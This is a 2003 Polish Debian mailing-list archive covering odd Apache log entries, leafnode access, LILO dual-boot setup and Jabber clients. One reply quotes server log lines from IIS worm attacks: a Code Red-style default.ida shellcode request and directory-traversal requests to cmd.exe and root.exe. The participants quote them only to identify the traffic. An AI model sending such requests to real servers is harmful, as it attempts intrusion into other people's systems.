Re: Dziwny dziw :)
On Sat, 18 Jan 2003, Tomasz T. Ciaszczyk wrote: > : > IP2 - - [17/Jan/2003:22:38:21 +0100] "\xe3A" 401 - "-" "-" > : imho, jakis wirus... ja mialem dziwne logi z wirusow atakujacych > : microsoftowe I-costam... taki serwer www, zawsze zapimniam nazwy > IIS. > Wirus ten nie pytal si eo takie smieci tylko o: nie twierdze ze to nimbda... moze to cos "nastepnego" w sumie sam jestem ciekaw cio to moze byc? tomcio tomasz grzegorz zaborowski --/-- operator sieci komputerowej, IFT, UWr. http://zabora.of.pl /-[ http://zas.ift.uni.wroc.pl [EMAIL PROTECTED] /-[ 071 3759402 ---/-PHP-JAVA-SQL-CGI-HTML-UNIX-SECURE-NET-AMIGA
Re: Dziwny dziw :)
t0masz zab0rowski napisał w dniu pią, sty 17, 2003 at 11:49:37 CET co następuje: : On Fri, 17 Jan 2003, Łukasz Nowak wrote: : : > Witam, : > : > Coś mnie apacz ostatnio zaskoczył. To co następuje: : > : > IP1 - - [17/Jan/2003:22:38:20 +0100] "\xe3V" 401 - "-" "-" : > IP2 - - [17/Jan/2003:22:38:21 +0100] "\xe3A" 401 - "-" "-" : : error 401 to: brak autoryzacji, user pyta o dokument, ale nie podal : prawidlowego loginu lub paselka : : imho, jakis wirus... ja mialem dziwne logi z wirusow atakujacych : microsoftowe I-costam... taki serwer www, zawsze zapimniam nazwy IIS. Wirus ten nie pytal si eo takie smieci tylko o: 61.55.142.76 - - [12/Jan/2003:14:07:15 +0100] "GET /default.ida?%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u%u00=a HTTP/1.0" 400 328 "-" "-" 209.105.192.82 - - [12/Jan/2003:14:41:23 +0100] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-" 194.27.78.23 - - [12/Jan/2003:16:22:31 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 286 "-" "-" 194.27.78.23 - - [12/Jan/2003:16:22:34 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 284 "-" "-" 194.27.78.23 - - [12/Jan/2003:16:22:44 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294 "-" "-" 194.27.78.23 - - [12/Jan/2003:16:22:48 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294 "-" "-" itd etc.. ale tego typu.. -- Pozdrawiam, TTC .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.- .:: Tomasz T. Ciaszczyk [ ciachociacho.pl ] >> http://ciacho.pl << .:: .:: Beware of the ... Oh, NOOO! Arghhh! `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- pgp2QszbPhulm.pgp Description: PGP signature
Re: Dziwny dziw :)
On Fri, 17 Jan 2003, Łukasz Nowak wrote: > Witam, > > Coś mnie apacz ostatnio zaskoczył. To co następuje: > > IP1 - - [17/Jan/2003:22:38:20 +0100] "\xe3V" 401 - "-" "-" > IP2 - - [17/Jan/2003:22:38:21 +0100] "\xe3A" 401 - "-" "-" error 401 to: brak autoryzacji, user pyta o dokument, ale nie podal prawidlowego loginu lub paselka imho, jakis wirus... ja mialem dziwne logi z wirusow atakujacych microsoftowe I-costam... taki serwer www, zawsze zapimniam nazwy tomcio tomasz grzegorz zaborowski --/-- operator sieci komputerowej, IFT, UWr. http://zabora.of.pl /-[ http://zas.ift.uni.wroc.pl [EMAIL PROTECTED] /-[ 071 3759402 ---/-PHP-JAVA-SQL-CGI-HTML-UNIX-SECURE-NET-AMIGA
Re: Dziwny dziw :)
On Fri, Jan 17, 2003 at 10:32:18PM +0100, Łukasz Nowak wrote: > IP1 - - [17/Jan/2003:22:38:20 +0100] "\xe3V" 401 - "-" "-" > IP2 - - [17/Jan/2003:22:38:21 +0100] "\xe3A" 401 - "-" "-" > IP2 - - [17/Jan/2003:22:38:21 +0100] "\xe3A" 401 - "-" "-" > IP3 - - [17/Jan/2003:22:38:21 +0100] "\xe3B" 401 - "-" "-" > IP2 - - [17/Jan/2003:22:38:21 +0100] "\xe3A" 401 - "-" "-" > IP3 - - [17/Jan/2003:22:38:22 +0100] "\xe3B" 401 - "-" "-" > IP3 - - [17/Jan/2003:22:38:25 +0100] "\xe3B" 401 - "-" "-" > IP4 - - [17/Jan/2003:22:38:26 +0100] "\xe3C" 401 - "-" "-" > IP5 - - [17/Jan/2003:22:38:26 +0100] "\xe3@" 401 - "-" "-" > IP6 - - [17/Jan/2003:22:38:28 +0100] "\xe3<" 401 - "-" "-" > IP7 - - [17/Jan/2003:22:38:30 +0100] "\xe3P" 401 - "-" "-" > IP8 - - [17/Jan/2003:22:38:30 +0100] "\xe3P" 401 - "-" "-" > IP8 - - [17/Jan/2003:22:38:30 +0100] "\xe3P" 401 - "-" "-" > IP8 - - [17/Jan/2003:22:38:30 +0100] "\xe3P" 401 - "-" "-" > IP9 - - [17/Jan/2003:22:38:32 +0100] "\xe3J" 401 - "-" "-" > > IPn (n:<1-9>) są z różnych części świata, dość mocno niepowiązane. Nie > uważam, aby to był dscan, a na 100% nie dDos, ale jest to ciekawe. Macie > coś podobnego w logach? Czy może "muj prowezjonalny prowajder" sobie ze > mnie "prowezjonalne" jaja robi? ;) Swego czasu było coś takiego, jakiś exploit alboco. Ja przechodziłem to gdzieś w październiku. -- Bartłomiej Krajewski bartek @ kozanostra.org || kozanostra.internetdsl.pl
Dziwny dziw :)
Witam, Coś mnie apacz ostatnio zaskoczył. To co następuje: IP1 - - [17/Jan/2003:22:38:20 +0100] "\xe3V" 401 - "-" "-" IP2 - - [17/Jan/2003:22:38:21 +0100] "\xe3A" 401 - "-" "-" IP2 - - [17/Jan/2003:22:38:21 +0100] "\xe3A" 401 - "-" "-" IP3 - - [17/Jan/2003:22:38:21 +0100] "\xe3B" 401 - "-" "-" IP2 - - [17/Jan/2003:22:38:21 +0100] "\xe3A" 401 - "-" "-" IP3 - - [17/Jan/2003:22:38:22 +0100] "\xe3B" 401 - "-" "-" IP3 - - [17/Jan/2003:22:38:25 +0100] "\xe3B" 401 - "-" "-" IP4 - - [17/Jan/2003:22:38:26 +0100] "\xe3C" 401 - "-" "-" IP5 - - [17/Jan/2003:22:38:26 +0100] "\xe3@" 401 - "-" "-" IP6 - - [17/Jan/2003:22:38:28 +0100] "\xe3<" 401 - "-" "-" IP7 - - [17/Jan/2003:22:38:30 +0100] "\xe3P" 401 - "-" "-" IP8 - - [17/Jan/2003:22:38:30 +0100] "\xe3P" 401 - "-" "-" IP8 - - [17/Jan/2003:22:38:30 +0100] "\xe3P" 401 - "-" "-" IP8 - - [17/Jan/2003:22:38:30 +0100] "\xe3P" 401 - "-" "-" IP9 - - [17/Jan/2003:22:38:32 +0100] "\xe3J" 401 - "-" "-" IPn (n:<1-9>) są z różnych części świata, dość mocno niepowiązane. Nie uważam, aby to był dscan, a na 100% nie dDos, ale jest to ciekawe. Macie coś podobnego w logach? Czy może "muj prowezjonalny prowajder" sobie ze mnie "prowezjonalne" jaja robi? ;) Pozdrawiam, Łukasz PS. Właśnie googlnąłem za tymi znaczkami, a tu cisza. To aż tak stare?;) -- Łukasz Nowak | Civilization starts with espresso... pgps4Oy7zzxsm.pgp Description: PGP signature
Re: leafnode
On Fri, Jan 17, 2003 at 08:46:29PM +0100, Tomasz Szulborski wrote: > Leafnode jest uruchamiany poprzez inetd (nntp stream tcp nowait > news /usr/sbin/tcpd /usr/sbin/leafnode).A oto i problem: Nie moge > polaczyc sie z leafnode z innych komputerow w sieci, tzn wywala time Sprawdz /etc/hosts.allow (hosty dopuszczane przez tcp-wrappers [tcpd]), powinno sie tam znalezc cos w stylu: leafnode: 192.168.0.0/255.255.0.0 Gdzie pierwsza wartosc to dopuszczane IP (ANDowane maska za ukosnikiem). Jesli chcesz wiedziec wiecej poczytaj strone man hosts.(allow|deny) Pozdrawiam -- _.|._ |_ _.: Adam Byrtek, alpha@(irc.pl|debian.org) (_|||_)| |(_|: gg 1802819, pgp 0xB25952C0 |: jid alpha.pl(at)jabber.org
Re: win2k & deban na jednym dysku c.d.
- Original Message - From: <[EMAIL PROTECTED]> > Metody sa w sumie 2 z lilo w MBR. > 1. Jak wyzej, po czym odpalamy Linuxa z dyskietki lub CD i uruchamiamy lilo, ktore zajmie z powrotem > MBR. > > lub > > 2. Instalujemy najpierw wingroze zostawiajac miejsce na dysku, pozniej Linuxa z lilo w MBR. Nauczony doswiadczeniem polecam opcje pierwsza. Druga moze wydawac sie "latwiejsza" ale wiem ze bardzo latwo mozna zostawic za malo miejsca na Linux a przy okazji fdisk w DOSie ma tle opcji (przy pierwszej opcji mozemy dokladniej ustalic partycje itp). Po prostu - pierwsza jest o wiele bardziej "przyjemna". :) Oczywiscie wszystko b. subiektywne Pozdrawiam Marek
leafnode
Witam, jestem nowy na tej liscie, wiec chcialbym sie przywitac. Mam problem z leafnode (instalowany poprzez apt z plyty). W pliku konfiguracyjnym wpisalem tylko serwer z ktorego ma pobierac posty. Leafnode jest uruchamiany poprzez inetd (nntp stream tcp nowait news /usr/sbin/tcpd /usr/sbin/leafnode).A oto i problem: Nie moge polaczyc sie z leafnode z innych komputerow w sieci, tzn wywala time out. Z komputera na ktorym jest zainstalowany serwer moge sie polaczyc, ale trwa to okolo 6-7 sekund. Wie ktos moze co z tym zrobic? Dzieki z gory! -- |---=< [EMAIL PROTECTED] >==< GG 642761 >=| | Szef dzialu "Linux" w magazynie @t -> www.at.g.pl | | Linux registered user number 258846 | |---|
Re: win2k & deban na jednym dysku c.d.
Witam, >On Thu, Jan 16, 2003 at 09:01:03PM +0100, |K a C z Y| wrote: >> On Thu, 16 Jan 2003, Robert Różak wrote: >> > 2. LILO instaluje na partycji linuksowej i ustawiam ją aktywną. >> > >> > 3. Po instalacji ( i reinstalacjach :( ) windows jedyne co muszę zrobić >> > to spowrotem ustawić partycje linuksową jako aktywną. >> >> IMHO te dwa punkty można pominać jeśli lilo będzie w MBR. > >Niestety Windows bez pytania nadpisze MBR. Metody sa w sumie 2 z lilo w MBR. 1. Jak wyzej, po czym odpalamy Linuxa z dyskietki lub CD i uruchamiamy lilo, ktore zajmie z powrotem MBR. lub 2. Instalujemy najpierw wingroze zostawiajac miejsce na dysku, pozniej Linuxa z lilo w MBR. -- Krzysztof 'C00li' Kulinski [EMAIL PROTECTED] GG: 1801311 ICQ: 11712754 Odigo: 5876840 rally.pl [EMAIL PROTECTED] - 3miasto -- http://www.nazwa.pl
Re: win2k & deban na jednym dysku c.d.
Użytkownik Robert Różak napisał: Niestety Windows bez pytania nadpisze MBR. r. Żaden problem, wystarczy wystartować z płytki Debiana, podać odpowiednie parametry (na ekranie startowym wcisnąć F3 to pojawi się mała pomoc), odpalić poprawnie skonfigurowane lilo, zresetować i po kłopocie. -- http://www.miki.z.pl [EMAIL PROTECTED] Gadu-gadu: 2128279 Mobile: +48607345846 Linux Registered User # 285966 "Linux is a good wigwam - no windows, no gates, and apache inside!"
Re: win2k & deban na jednym dysku c.d.
On Thu, Jan 16, 2003 at 09:01:03PM +0100, |K a C z Y| wrote: > On Thu, 16 Jan 2003, Robert Różak wrote: > > 2. LILO instaluje na partycji linuksowej i ustawiam ją aktywną. > > > > 3. Po instalacji ( i reinstalacjach :( ) windows jedyne co muszę zrobić > > to spowrotem ustawić partycje linuksową jako aktywną. > > IMHO te dwa punkty można pominać jeśli lilo będzie w MBR. Niestety Windows bez pytania nadpisze MBR. r.
Re: [OT] klient jabbera textowy w pakiecie
Krzysztof Zubik napisał w dniu pią, sty 17, 2003 at 01:39:29 CET co następuje: : "Tomasz T. Ciaszczyk" napisał. : : > Zna ktos takowy? : > Wedlug apt-cache search to jest takowy imcom, ale czy sa inne klienty? : : Witam. : Moze sie przyda. http://www.jabberpl.org : Niedawno czytalem wiadomosci, ze to dosc ciekawy komunikator i : raczej lepszy od GG. Jednak rowniez spotkalem sie z informacja, ze : uzycie transportu Jabbera do obslugi GG moze doprowadzic do zablokowania nr. : podobnie jak mna to miejsce w przypadku uzywania innych nieoficjalnych : klientow GG. Inne nieoficjalnego klienty GG = klienty windowsowe ktore wycinaja banerki na ktorych SMSExpress zarabia. -- Pozdrawiam, TTC .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.- .:: Tomasz T. Ciaszczyk [ ciachociacho.pl ] >> http://ciacho.pl << .:: .:: Zazdrość jest jedną z najgorszych rzeczy na świecie. .:: Dlatego chcę być teraz tam gdzie Ty stąpasz swoimi .:: stopami po ziemi .:: -- TTC `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Re: [OT] klient jabbera textowy w pakiecie
"Tomasz T. Ciaszczyk" napisał. > Zna ktos takowy? > Wedlug apt-cache search to jest takowy imcom, ale czy sa inne klienty? Witam. Moze sie przyda. http://www.jabberpl.org Niedawno czytalem wiadomosci, ze to dosc ciekawy komunikator i raczej lepszy od GG. Jednak rowniez spotkalem sie z informacja, ze uzycie transportu Jabbera do obslugi GG moze doprowadzic do zablokowania nr. podobnie jak mna to miejsce w przypadku uzywania innych nieoficjalnych klientow GG. Konczac Pozdrawiam. Krzysztof. Registered Linux User: 253243 | Powered by Red Hat 7.1 Krzysztof Zubik. | [EMAIL PROTECTED] | [EMAIL PROTECTED] http://www.idn.org.pl/users/kzubik GaduGadu. 1208376 | Glosowy chat na yahoo kzubik2000
Re: win2k & deban na jednym dysku c.d.
On Thu, 16 Jan 2003, Robert Różak wrote: > 2. LILO instaluje na partycji linuksowej i ustawiam ją aktywną. > > 3. Po instalacji ( i reinstalacjach :( ) windows jedyne co muszę zrobić > to spowrotem ustawić partycje linuksową jako aktywną. IMHO te dwa punkty można pominać jeśli lilo będzie w MBR.
